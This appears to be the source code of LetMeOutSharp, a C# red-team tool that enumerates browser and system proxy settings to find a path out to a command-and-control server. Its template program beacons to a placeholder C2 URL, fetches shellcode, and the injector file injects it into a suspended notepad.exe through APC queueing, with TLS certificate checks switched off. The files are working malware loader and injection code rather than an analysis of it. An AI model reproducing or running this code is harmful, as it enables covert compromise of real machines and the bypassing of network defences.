{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.ActiveCfg = Release|anycpu 15 | {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.Build.0 = Release|anycpu 16 | EndGlobalSection 17 | EndGlobal 18 | -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/Info.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Text; 6 | using Microsoft.Win32; 7 | 8 | namespace LetMeOutSharp 9 | { 10 | public static class UserAgents 11 | { 12 | //Default User-Agents 13 | public static readonly string NOUA = ""; 14 | 15 | public static readonly string CHUA = 16 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"; 17 | 18 | public static readonly string EDUA = 19 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edge/86.0.622.51"; 20 | 21 | public static readonly string WHUA = "WinHttp-Autoproxy-Service/5.1"; 22 | 23 | public static readonly string FFUA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"; 24 | } 25 | 26 | public class ConfigPair 27 | { 28 | public Uri URL { get; set; } 29 | public string UserAgent { get; set; } 30 | public string URLString 31 | { 32 | get 33 | { 34 | if (URL == null) 35 | { 36 | return ""; 37 | } 38 | else 39 | { 40 | return URL.ToString(); 41 | } 42 | } 43 | } 44 | public override string ToString() 45 | { 46 | string url = ""; 47 | if (URL != null) 48 | { 49 | url = URL.ToString(); 50 | } 51 | return string.Format("\tProxy URL: {0} - UA: {1}", url, UserAgent); 52 | } 53 | } 54 | 55 | public static class Enumerator 56 | { 57 | //Get entries from the registry 58 | public static ConfigPair GetRegistry(string key, string value, string UA) 59 | { 60 | ConfigPair ret = null; 61 | try 62 | { 63 | var regkey = Registry.GetValue(key, value, null); 64 | if (regkey != null) 65 | { 66 | ret = new ConfigPair { URL = regkey.ToString().ToUri(), UserAgent = UA }; 67 | } 68 | } 69 | catch (Exception ex) 70 | { 71 | #if DEBUG 72 | Console.WriteLine("[*] An exception occured: {0}", ex); 73 | #endif 74 | } 75 | return ret; 76 | } 77 | 78 | 79 | //Retrieve the PAC URL for IE via the registry 80 | public static List GetIEPAC() 81 | { 82 | #if DEBUG 83 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 84 | #endif 85 | List ret = new List(); 86 | 87 | //Read PAC URL from HKCU 88 | var pacurl_hkcu = GetRegistry("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", "AutoConfigURL", UserAgents.WHUA); 89 | if (pacurl_hkcu != null && !ret.Any(x => x.URL.Equals(pacurl_hkcu.URL))) 90 | { 91 | ret.Add(pacurl_hkcu); 92 | } 93 | 94 | //Read PAC URL from HKLM 95 | var pacurl_hklm = GetRegistry("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", "AutoConfigURL", UserAgents.WHUA); 96 | if (pacurl_hklm != null && !ret.Any(x => x.URL.Equals(pacurl_hklm.URL))) 97 | { 98 | ret.Add(pacurl_hklm); 99 | } 100 | 101 | #if DEBUG 102 | Console.WriteLine("\t{0} PAC", ret.Count); 103 | foreach (var pac in ret) 104 | { 105 | Console.WriteLine("\tPAC: {0}", pac); 106 | } 107 | #endif 108 | return ret; 109 | } 110 | 111 | //Retrieve the PAC URL for Chrome via the registry 112 | public static List GetChromePAC() 113 | { 114 | #if DEBUG 115 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 116 | #endif 117 | List ret = new List(); 118 | 119 | //Read PAC URL from HKCU 120 | var pacurl_hkcu = GetRegistry("HKEY_CURRENT_USER\\Software\\Policies\\Google\\Chrome\\", "ProxyPacUrl", UserAgents.CHUA); 121 | if (pacurl_hkcu != null && !ret.Any(x => x.URL.Equals(pacurl_hkcu.URL))) 122 | { 123 | ret.Add(pacurl_hkcu); 124 | } 125 | 126 | //Read PAC URL from HKLM 127 | var pacurl_hklm = GetRegistry("HKEY_LOCAL_MACHINE\\Software\\Policies\\Google\\Chrome\\", "ProxyPacUrl", UserAgents.CHUA); 128 | if (pacurl_hklm != null && !ret.Any(x => x.URL.Equals(pacurl_hklm.URL))) 129 | { 130 | ret.Add(pacurl_hklm); 131 | } 132 | 133 | #if DEBUG 134 | Console.WriteLine("\t{0} PAC", ret.Count); 135 | foreach (var pac in ret) 136 | { 137 | Console.WriteLine("\tPAC: {0}", pac); 138 | } 139 | #endif 140 | return ret; 141 | } 142 | 143 | //Retrieve the PAC URL for Firefox via the prefs file 144 | public static List GetFirefoxPAC() 145 | { 146 | #if DEBUG 147 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 148 | #endif 149 | 150 | List ret = new List(); 151 | try 152 | { 153 | string profiles = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + 154 | "\\Mozilla\\Firefox\\Profiles\\"; 155 | if (Directory.Exists(profiles)) 156 | { 157 | foreach (string dir in Directory.GetDirectories(profiles)) 158 | { 159 | Uri pacURL = null; 160 | string prefFile = string.Format("{0}\\{1}", dir, "prefs.js"); 161 | if (File.Exists(prefFile)) 162 | { 163 | string[] readText = File.ReadAllLines(prefFile); 164 | foreach (string line in readText) 165 | { 166 | if (line.Contains("network.proxy.autoconfig_url\"")) 167 | { 168 | pacURL = line.Split(',')[1].Trim().Split('"')[1].ToUri(); 169 | ret.Add(new ConfigPair { URL = pacURL, UserAgent = UserAgents.FFUA }); 170 | } 171 | } 172 | } 173 | } 174 | } 175 | } 176 | catch (Exception ex) 177 | { 178 | #if DEBUG 179 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 180 | #endif 181 | } 182 | 183 | #if DEBUG 184 | Console.WriteLine("\t{0} PAC", ret.Count); 185 | foreach (var pac in ret) 186 | { 187 | Console.WriteLine("\tPAC: {0}", pac); 188 | } 189 | #endif 190 | return ret; 191 | } 192 | 193 | //Retrieve Proxy URL for Chrome 194 | public static List GetChromeProxy() 195 | { 196 | #if DEBUG 197 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 198 | #endif 199 | List ret = new List(); 200 | 201 | string profiles = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + 202 | "\\Google\\"; 203 | if (Directory.Exists(profiles)) 204 | { 205 | //Chrome is installed. Will also try to get the system proxy and use the chrome UA 206 | try 207 | { 208 | Uri site_to_check = new Uri("https://www.google.com"); 209 | Uri proxy = System.Net.WebRequest.GetSystemWebProxy().GetProxy(site_to_check); 210 | if (proxy != null && proxy != site_to_check) 211 | { 212 | if (!ret.Any(x => x.URL.Equals(proxy))) 213 | { 214 | ret.Add(new ConfigPair { URL = proxy, UserAgent = UserAgents.CHUA }); 215 | } 216 | } 217 | } 218 | catch (Exception ex) 219 | { 220 | #if DEBUG 221 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 222 | #endif 223 | } 224 | } 225 | 226 | //Read proxy from HKCU 227 | var proxy_hkcu = GetRegistry("HKEY_CURRENT_USER\\Software\\Policies\\Google\\Chrome\\", "ProxyServer", UserAgents.CHUA); 228 | if (proxy_hkcu != null && !ret.Any(x => x.URL.Equals(proxy_hkcu.URL))) 229 | { 230 | ret.Add(proxy_hkcu); 231 | } 232 | 233 | //Read proxy from HKLM 234 | var proxy_hklm = GetRegistry("HKEY_LOCAL_MACHINE\\Software\\Policies\\Google\\Chrome\\", "ProxyServer", UserAgents.CHUA); 235 | if (proxy_hklm != null && !ret.Any(x => x.URL.Equals(proxy_hklm.URL))) 236 | { 237 | ret.Add(proxy_hklm); 238 | } 239 | 240 | //Get value from CommandLine 241 | try 242 | { 243 | foreach (var process in System.Diagnostics.Process.GetProcessesByName("chrome")) 244 | { 245 | string proxyServer = process.GetCommandLine(); 246 | if (!string.IsNullOrEmpty(proxyServer)) 247 | { 248 | Uri proxyUri = proxyServer.ToUri(); 249 | if (!ret.Any(x => x.URL.Equals(proxyUri))) 250 | { 251 | ret.Add(new ConfigPair { URL = proxyUri, UserAgent = UserAgents.CHUA }); 252 | } 253 | } 254 | } 255 | } 256 | catch (Exception ex) 257 | { 258 | #if DEBUG 259 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 260 | #endif 261 | } 262 | 263 | #if DEBUG 264 | Console.WriteLine("\t{0} proxies", ret.Count); 265 | foreach (var proxy in ret) 266 | { 267 | Console.WriteLine(proxy); 268 | } 269 | #endif 270 | return ret; 271 | } 272 | 273 | //Retrieve Proxy URL for IE from the registry 274 | public static List GetIEProxy() 275 | { 276 | #if DEBUG 277 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 278 | #endif 279 | List ret = new List(); 280 | 281 | //Get value from HKCU 282 | var proxy_hkcu = GetRegistry("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", "ProxyServer", UserAgents.EDUA); 283 | if (proxy_hkcu != null) 284 | { 285 | ret.Add(proxy_hkcu); 286 | } 287 | 288 | //Get value from HKLM 289 | var proxy_hklm = GetRegistry("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", "ProxyServer", UserAgents.EDUA); 290 | if (proxy_hklm != null && !ret.Any(x => x.URL.Equals(proxy_hklm.URL))) 291 | { 292 | ret.Add(proxy_hklm); 293 | } 294 | 295 | //Get proxy for google via GetSystemWebProxy 296 | try 297 | { 298 | Uri site_to_check = new Uri("https://www.google.com"); 299 | Uri proxy = System.Net.WebRequest.GetSystemWebProxy().GetProxy(site_to_check); 300 | if (proxy != null && proxy != site_to_check) 301 | { 302 | if (!ret.Any(x => x.URL.Equals(proxy))) 303 | { 304 | ret.Add(new ConfigPair { URL = proxy, UserAgent = UserAgents.EDUA }); 305 | } 306 | } 307 | } 308 | catch (Exception ex) 309 | { 310 | #if DEBUG 311 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 312 | #endif 313 | } 314 | 315 | #if DEBUG 316 | Console.WriteLine("\t{0} proxies", ret.Count); 317 | foreach (var proxy in ret) 318 | { 319 | Console.WriteLine(proxy); 320 | } 321 | #endif 322 | return ret; 323 | } 324 | 325 | //Retrieve the Proxy URL for Firefox via the prefs file 326 | public static List GetFirefoxProxy() 327 | { 328 | #if DEBUG 329 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 330 | #endif 331 | List ret = new List(); 332 | try 333 | { 334 | string profiles = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + 335 | "\\Mozilla\\Firefox\\Profiles\\"; 336 | if (Directory.Exists(profiles)) 337 | { 338 | //Firefox is installed. Will also try to get the system proxy and use the firefox UA 339 | try 340 | { 341 | Uri site_to_check = new Uri("https://www.google.com"); 342 | Uri proxy = System.Net.WebRequest.GetSystemWebProxy().GetProxy(site_to_check); 343 | if (proxy != null && proxy != site_to_check) 344 | { 345 | if (!ret.Any(x => x.URL.Equals(proxy))) 346 | { 347 | ret.Add(new ConfigPair { URL = proxy, UserAgent = UserAgents.FFUA }); 348 | } 349 | } 350 | } 351 | catch (Exception ex) 352 | { 353 | #if DEBUG 354 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 355 | #endif 356 | } 357 | 358 | //Have a look at the profiles 359 | foreach (string dir in Directory.GetDirectories(profiles)) 360 | { 361 | string proxyAddress = ""; 362 | string proxyPort = ""; 363 | string proxySslAddress = ""; 364 | string proxySslPort = ""; 365 | string prefFile = string.Format("{0}\\{1}", dir, "prefs.js"); 366 | #if DEBUG 367 | Console.WriteLine("\tPrefs file: {0}", prefFile); 368 | #endif 369 | if (File.Exists(prefFile)) 370 | { 371 | string[] readText = File.ReadAllLines(prefFile); 372 | foreach (string line in readText) 373 | { 374 | if (line.Contains("network.proxy.http\"")) 375 | { 376 | proxyAddress = line.Split(',')[1].Trim().Split('"')[1]; 377 | } 378 | 379 | if (line.Contains("network.proxy.http_port\"")) 380 | { 381 | proxyPort = line.Split(',')[1].Trim().Replace(");", ""); 382 | } 383 | 384 | if (line.Contains("network.proxy.ssl\"")) 385 | { 386 | proxySslAddress = line.Split(',')[1].Trim().Split('"')[1]; 387 | } 388 | 389 | if (line.Contains("network.proxy.ssl_port\"")) 390 | { 391 | proxySslPort = line.Split(',')[1].Trim().Replace(");", ""); 392 | } 393 | } 394 | 395 | if (!(string.IsNullOrEmpty(proxyAddress) || string.IsNullOrEmpty(proxyPort))) 396 | { 397 | Uri p = string.Format("{0}:{1}", proxyAddress, proxyPort).ToUri(); 398 | if (!ret.Any(x => x.URL.Equals(p))) 399 | { 400 | ret.Add(new ConfigPair { URL = p, UserAgent = UserAgents.FFUA }); 401 | } 402 | } 403 | 404 | if (!(string.IsNullOrEmpty(proxySslAddress) || string.IsNullOrEmpty(proxySslPort))) 405 | { 406 | Uri p = string.Format("{0}:{1}", proxySslAddress, proxySslPort).ToUri(); 407 | if (!ret.Any(x => x.URL.Equals(p))) 408 | { 409 | ret.Add(new ConfigPair { URL = p, UserAgent = UserAgents.FFUA }); 410 | } 411 | } 412 | } 413 | } 414 | } 415 | } 416 | catch (Exception ex) 417 | { 418 | #if DEBUG 419 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 420 | #endif 421 | } 422 | 423 | #if DEBUG 424 | Console.WriteLine("\t{0} proxies", ret.Count); 425 | foreach (var proxy in ret) 426 | { 427 | Console.WriteLine(proxy); 428 | } 429 | #endif 430 | return ret; 431 | } 432 | 433 | // Retrieve IE, Chrome, Firefox PAC URLs 434 | public static List GetPACURLS() 435 | { 436 | #if DEBUG 437 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 438 | #endif 439 | //Get all PAC URL's in a list 440 | 441 | List PACURL = new List(); 442 | var ie = GetIEPAC(); 443 | PACURL.AddRange(ie); 444 | var ch = GetChromePAC(); 445 | PACURL.AddRange(ch); 446 | var fx = GetFirefoxPAC(); 447 | PACURL.AddRange(fx); 448 | 449 | #if DEBUG 450 | Console.WriteLine("GetPACURLS: {0} PAC", PACURL.Count); 451 | #endif 452 | return PACURL; 453 | } 454 | 455 | //Retrieve all proxies from the PAC URLs 456 | public static List GetProxiesFromPAC() 457 | { 458 | List ret = new List(); 459 | foreach (ConfigPair conf in GetPACURLS()) 460 | { 461 | List proxyconfig = GetPAC(conf); 462 | foreach (ConfigPair proxy in proxyconfig) 463 | { 464 | if (!ret.Any(x => x.URL.Equals(proxy.URL) && x.UserAgent.Equals(proxy.UserAgent))) 465 | { 466 | ret.Add(proxy); 467 | } 468 | } 469 | } 470 | return ret; 471 | } 472 | 473 | //Process PAC URL and extract proxies 474 | public static List GetPAC(ConfigPair config) 475 | { 476 | #if DEBUG 477 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 478 | Console.WriteLine("Processing PAC: {0}", config.URL.ToString()); 479 | #endif 480 | List ret = new List(); 481 | try 482 | { 483 | string pacData = GetHTTP(config.URL, null, config.UserAgent); 484 | 485 | if (!pacData.Contains("PROXY ")) 486 | { 487 | return ret; 488 | } 489 | 490 | System.Text.RegularExpressions.Regex 491 | rx = new System.Text.RegularExpressions.Regex(@"PROXY (.*?):(\d+)"); 492 | 493 | System.Text.RegularExpressions.MatchCollection matches = rx.Matches(pacData); 494 | foreach (System.Text.RegularExpressions.Match match in matches) 495 | { 496 | Uri srv = string.Format("{0}:{1}", match.Groups[1].Value, match.Groups[2].Value).ToUri(); 497 | if (!ret.Any(x => x.URL.Equals(srv))) 498 | { 499 | //if winhttp convert to IE 500 | if (config.UserAgent.Equals(UserAgents.WHUA)) 501 | config.UserAgent = UserAgents.EDUA; 502 | ret.Add(new ConfigPair { URL = srv, UserAgent = config.UserAgent }); 503 | } 504 | } 505 | } 506 | catch (Exception ex) 507 | { 508 | #if DEBUG 509 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 510 | #endif 511 | } 512 | #if DEBUG 513 | Console.WriteLine("\tProxies: {0}", ret.Count); 514 | foreach (var proxy in ret) 515 | { 516 | Console.WriteLine("{0}", proxy); 517 | } 518 | #endif 519 | return ret; 520 | } 521 | 522 | //Get proxies for Chrome, Firefox, IE 523 | public static List GetProxies() 524 | { 525 | #if DEBUG 526 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 527 | #endif 528 | //Get all Proxies in a list 529 | 530 | List proxies = new List(); 531 | try 532 | { 533 | proxies.AddRange(GetChromeProxy()); 534 | proxies.AddRange(GetFirefoxProxy()); 535 | proxies.AddRange(GetIEProxy()); 536 | } 537 | catch (Exception ex) 538 | { 539 | #if DEBUG 540 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 541 | #endif 542 | } 543 | #if DEBUG 544 | Console.WriteLine("GetProxies: {0}", proxies.Count); 545 | #endif 546 | return proxies; 547 | } 548 | 549 | //Extract proxy configuration from commandline 550 | private static string GetCommandLine(this System.Diagnostics.Process process) 551 | { 552 | try 553 | { 554 | string cmdLine = null; 555 | using (var searcher = new System.Management.ManagementObjectSearcher( 556 | string.Format("SELECT CommandLine FROM Win32_Process WHERE ProcessId = {0}", process.Id))) 557 | { 558 | var matchEnum = searcher.Get().GetEnumerator(); 559 | if (matchEnum.MoveNext()) 560 | { 561 | cmdLine = matchEnum.Current["CommandLine"]?.ToString(); 562 | } 563 | } 564 | if (cmdLine != null && cmdLine.Contains("proxy")) 565 | { 566 | System.Text.RegularExpressions.Regex pattern = 567 | new System.Text.RegularExpressions.Regex(@"proxy-server=[^\s]*"); 568 | System.Text.RegularExpressions.Match match = pattern.Match(cmdLine); 569 | #if DEBUG 570 | Console.WriteLine("\tProxy from cmd: {0}", match.ToString().TrimStart('"').TrimEnd('"')); 571 | #endif 572 | return match.ToString().Replace("proxy-server=", "").TrimStart('"').TrimEnd('"'); 573 | } 574 | } 575 | catch (Exception ex) 576 | { 577 | #if DEBUG 578 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 579 | #endif 580 | } 581 | 582 | return ""; 583 | } 584 | 585 | public static string GetHTTP(Uri url, ConfigPair config) 586 | { 587 | return GetHTTP(url, config.URL, config.UserAgent); 588 | } 589 | 590 | //Do HTTP requests 591 | public static string GetHTTP(Uri url, Uri proxySrv = null, string userAgent = "") 592 | { 593 | #if DEBUG 594 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 595 | Console.WriteLine("\tProxy to use: {0}", proxySrv); 596 | Console.WriteLine("\tUA to use: {0}", userAgent); 597 | #endif 598 | 599 | try 600 | { 601 | //var target = url; 602 | System.Net.ServicePointManager.ServerCertificateValidationCallback += 603 | new System.Net.Security.RemoteCertificateValidationCallback(ValidateRemoteCertificate); 604 | 605 | System.Net.IWebProxy proxy = null; 606 | 607 | if (proxySrv == null) 608 | { 609 | proxy = new System.Net.WebProxy(); 610 | } 611 | else 612 | { 613 | proxy = new System.Net.WebProxy(proxySrv); 614 | } 615 | 616 | var credentials = System.Net.CredentialCache.DefaultCredentials; 617 | proxy.Credentials = credentials; //Set credentials for passthrough auth to proxy 618 | 619 | System.Net.HttpWebRequest request = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(url); 620 | request.Proxy = proxy; 621 | if (!string.IsNullOrEmpty(userAgent)) 622 | { 623 | request.UserAgent = userAgent; 624 | } 625 | 626 | request.Credentials = System.Net.CredentialCache.DefaultCredentials; 627 | request.Timeout = 15000; 628 | 629 | System.Net.HttpWebResponse response = (System.Net.HttpWebResponse)request.GetResponse(); 630 | Stream resStream = response.GetResponseStream(); 631 | StreamReader readStream = new StreamReader(resStream, Encoding.UTF8); 632 | var data = readStream.ReadToEnd(); 633 | response.Close(); 634 | readStream.Close(); 635 | if (!string.IsNullOrEmpty(data)) 636 | { 637 | #if DEBUG 638 | Console.WriteLine("\tResponse Data: {0}", data); 639 | #endif 640 | return data; 641 | } 642 | } 643 | catch (System.Net.WebException ex) 644 | { 645 | #if DEBUG 646 | Console.WriteLine("\tHTTP Error: {0}", ex.Message); 647 | #endif 648 | } 649 | catch (Exception ex) 650 | { 651 | #if DEBUG 652 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 653 | #endif 654 | } 655 | return ""; 656 | } 657 | 658 | public static bool DoHTTP(Uri url, string response, string info, ConfigPair config) 659 | { 660 | #if DEBUG 661 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 662 | #endif 663 | try 664 | { 665 | Uri urlrequest = new Uri(string.Format("{0}?{1}", url.ToString(), info)); 666 | var resp = GetHTTP(urlrequest, config.URL, config.UserAgent); 667 | if (!string.IsNullOrEmpty(resp)) 668 | { 669 | if (resp.Contains(response)) 670 | { 671 | #if DEBUG 672 | Console.WriteLine("\tCanTalk: true"); 673 | #endif 674 | return true; 675 | } 676 | else 677 | { 678 | #if DEBUG 679 | Console.WriteLine("\tConnection success, but response not the same."); 680 | #endif 681 | return false; 682 | } 683 | } 684 | return false; 685 | } 686 | catch (Exception ex) 687 | { 688 | #if DEBUG 689 | Console.WriteLine("[*] An exception occured: {0}", ex); 690 | #endif 691 | return false; 692 | } 693 | } 694 | 695 | // Accept all certificates 696 | private static bool ValidateRemoteCertificate(object sender, 697 | System.Security.Cryptography.X509Certificates.X509Certificate certificate, 698 | System.Security.Cryptography.X509Certificates.X509Chain chain, 699 | System.Net.Security.SslPolicyErrors policyErrors) 700 | { 701 | return true; 702 | } 703 | 704 | } 705 | } -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/Injector.cs: -------------------------------------------------------------------------------- 1 | using System.Runtime.InteropServices; 2 | using System; 3 | 4 | namespace LetMeOutSharp 5 | { 6 | public class ApcInjectionNewProcess 7 | { 8 | public ApcInjectionNewProcess(byte[] shellcode) 9 | { 10 | 11 | // Target process to inject into 12 | string processpath = @"C:\Windows\notepad.exe"; 13 | if (Utilities.Is64BitProcess.Equals("0")) 14 | { 15 | processpath = @"c:\Windows\SysWOW64\notepad.exe"; 16 | } 17 | STARTUPINFO si = new STARTUPINFO(); 18 | PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); 19 | 20 | // Create new process in suspended state to inject into 21 | CreateProcess(processpath, null, IntPtr.Zero, IntPtr.Zero, false, ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi); 22 | 23 | // Allocate memory within process and write shellcode 24 | IntPtr address = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length, MEM_COMMIT, PAGE_READWRITE); 25 | IntPtr bytesWritten = IntPtr.Zero; 26 | WriteProcessMemory(pi.hProcess, address, shellcode, shellcode.Length, out bytesWritten); 27 | 28 | // Modify memory permissions on allocated shellcode 29 | uint oldProtect = 0; 30 | VirtualProtectEx(pi.hProcess, address, shellcode.Length, PAGE_EXECUTE_READ, out oldProtect); 31 | 32 | // Open thread 33 | IntPtr thread = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId); 34 | 35 | // Assign address of shellcode to the target thread apc queue 36 | QueueUserAPC(address, thread, IntPtr.Zero); 37 | 38 | // Resume the suspended thread 39 | ResumeThread(pi.hThread); 40 | } 41 | 42 | private static UInt32 MEM_COMMIT = 0x1000; 43 | private static UInt32 PAGE_READWRITE = 0x04; 44 | private static UInt32 PAGE_EXECUTE_READ = 0x20; 45 | 46 | public struct STARTUPINFO 47 | { 48 | public uint cb; 49 | public string lpReserved; 50 | public string lpDesktop; 51 | public string lpTitle; 52 | public uint dwX; 53 | public uint dwY; 54 | public uint dwXSize; 55 | public uint dwYSize; 56 | public uint dwXCountChars; 57 | public uint dwYCountChars; 58 | public uint dwFillAttribute; 59 | public uint dwFlags; 60 | public short wShowWindow; 61 | public short cbReserved2; 62 | public IntPtr lpReserved2; 63 | public IntPtr hStdInput; 64 | public IntPtr hStdOutput; 65 | public IntPtr hStdError; 66 | } 67 | 68 | public struct PROCESS_INFORMATION 69 | { 70 | public IntPtr hProcess; 71 | public IntPtr hThread; 72 | public uint dwProcessId; 73 | public uint dwThreadId; 74 | } 75 | 76 | [Flags] 77 | public enum ProcessCreationFlags : uint 78 | { 79 | ZERO_FLAG = 0x00000000, 80 | CREATE_BREAKAWAY_FROM_JOB = 0x01000000, 81 | CREATE_DEFAULT_ERROR_MODE = 0x04000000, 82 | CREATE_NEW_CONSOLE = 0x00000010, 83 | CREATE_NEW_PROCESS_GROUP = 0x00000200, 84 | CREATE_NO_WINDOW = 0x08000000, 85 | CREATE_PROTECTED_PROCESS = 0x00040000, 86 | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, 87 | CREATE_SEPARATE_WOW_VDM = 0x00001000, 88 | CREATE_SHARED_WOW_VDM = 0x00001000, 89 | CREATE_SUSPENDED = 0x00000004, 90 | CREATE_UNICODE_ENVIRONMENT = 0x00000400, 91 | DEBUG_ONLY_THIS_PROCESS = 0x00000002, 92 | DEBUG_PROCESS = 0x00000001, 93 | DETACHED_PROCESS = 0x00000008, 94 | EXTENDED_STARTUPINFO_PRESENT = 0x00080000, 95 | INHERIT_PARENT_AFFINITY = 0x00010000 96 | } 97 | 98 | [Flags] 99 | public enum ThreadAccess : int 100 | { 101 | TERMINATE = 0x0001, 102 | SUSPEND_RESUME = 0x0002, 103 | GET_CONTEXT = 0x0008, 104 | SET_CONTEXT = 0x0010, 105 | SET_INFORMATION = 0x0020, 106 | QUERY_INFORMATION = 0x0040, 107 | SET_THREAD_TOKEN = 0x0080, 108 | IMPERSONATE = 0x0100, 109 | DIRECT_IMPERSONATION = 0x0200 110 | } 111 | 112 | [DllImport("kernel32.dll")] 113 | private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 114 | 115 | [DllImport("kernel32.dll")] 116 | private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); 117 | 118 | [DllImport("kernel32.dll")] 119 | private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten); 120 | 121 | [DllImport("kernel32.dll")] 122 | private static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect); 123 | 124 | [DllImport("kernel32.dll")] 125 | private static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, int dwThreadId); 126 | 127 | [DllImport("kernel32.dll")] 128 | private static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); 129 | 130 | [DllImport("kernel32.dll")] 131 | private static extern uint ResumeThread(IntPtr hThread); 132 | } 133 | } 134 | -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/LetMeOutSharp.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Debug 5 | anycpu 6 | {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF} 7 | Exe 8 | LetMeOutSharp 9 | LetMeOutSharp 10 | v3.5 11 | 12 | 13 | true 14 | full 15 | false 16 | bin\Debug 17 | DEBUG; 18 | prompt 19 | 4 20 | true 21 | 22 | 23 | true 24 | bin\Release 25 | prompt 26 | 4 27 | true 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/Program_template.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | 4 | namespace LetMeOutSharp 5 | { 6 | public class MainClass 7 | { 8 | public static void Main(string[] args) 9 | { 10 | var canTalk = false; 11 | 12 | Uri C2 = new Uri("%C2URL%"); 13 | const string responseFromCheckurl = "%RESPONSE%"; // check response from our server 14 | 15 | if (!canTalk) 16 | { 17 | var proxies = new List(); 18 | proxies.AddRange(Enumerator.GetProxiesFromPAC()); 19 | proxies.AddRange(Enumerator.GetProxies()); 20 | proxies.Add(new ConfigPair { URL = null, UserAgent = UserAgents.EDUA }); 21 | proxies.Add(new ConfigPair { URL = null, UserAgent = UserAgents.CHUA }); 22 | proxies.Add(new ConfigPair { URL = null, UserAgent = UserAgents.FFUA }); 23 | #if DEBUG 24 | Console.WriteLine("\nWill try {0} connectivity methods", proxies.Count); 25 | foreach (var proxy in proxies) 26 | { 27 | Console.WriteLine(proxy); 28 | } 29 | #endif 30 | foreach (var proxy in proxies) 31 | { 32 | try 33 | { 34 | // a = base64 encoded proxy url, b = base64 encoded user agent, c = 1 for 64-bit or 0 for 32-bit 35 | var info = string.Format("a={0}&b={1}&c={2}", proxy.URLString.ToBase64(), proxy.UserAgent.ToBase64(), Utilities.Is64BitProcess); 36 | if (Enumerator.DoHTTP(C2, responseFromCheckurl, info, proxy)) 37 | { 38 | canTalk = true; 39 | #if DEBUG 40 | Console.WriteLine("Success with: {0}", proxy); 41 | #endif 42 | 43 | // Adding a small delay waiting for the shellcode to be generated - if you are getting errors in artifact_payload you may need to increase it 44 | System.Threading.Thread.Sleep(10000); 45 | string variant = ""; 46 | if (proxy.UserAgent.Equals(UserAgents.EDUA)) 47 | { 48 | variant = "edge"; //This value should match with the value in AggressiveProxy.cna and your Malleable profile variant 49 | } 50 | else if (proxy.UserAgent.Equals(UserAgents.CHUA)) 51 | { 52 | variant = "chrome"; //This value should match with the value in AggressiveProxy.cna and 